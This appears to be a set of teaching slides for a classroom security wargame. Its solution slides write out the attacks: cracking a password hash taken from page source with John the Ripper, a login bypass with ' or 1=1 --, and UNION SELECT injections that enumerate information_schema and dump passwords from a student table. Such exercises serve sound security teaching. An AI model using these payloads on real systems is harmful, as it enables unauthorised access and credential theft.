NS101 Wargame

1. NS101 Wargame A Security Challenge

2. Introduction • What is a wargame ? • Asecurity challenge in which one must exploit a vulnerability in a system or application or gain access to a computer system. • Usually involves several hacking techniques.

3. Goal & Rules • Complete 3 Missions • Use the tools/methods you learned from NS lessons • Find solutions on the Internet • DoS attacks are not allowed

4. It’s your term !

5. Solutions • Mission 1 • (1) View the source code of the page (2) Copy the encrypted password

6. Solutions • Mission 1 (3) Paste to a txt file (4) Use john the ripper to crack the password

7. Solutions • Mission 2 • Try or ‘ or 1=1 --’ ‘ or ‘a’=‘a

8. Solutions • Mission 3 • (1) Search the user name in the hint, this page show information in two column.

9. Solutions • Mission 3 • (2) try Select two column ‘ union SELECT table_name,table_typeFROM information_schema.tables where ‘a’ = ‘a Union the 2nd select statement ※ If you try and error , you will find out the database is MySQL ※ about information_schema Find out the table name

10. Solutions • Mission 3 • (3) try ‘ union SELECT column_name,column_type FROM information_schema.columns where table_name = ‘student Find all columns in student table Find out the hidden column

11. Solutions • Mission 3 • (4) try Show all passwords ‘ union SELECT id,pw FROM student where ‘a’= ‘a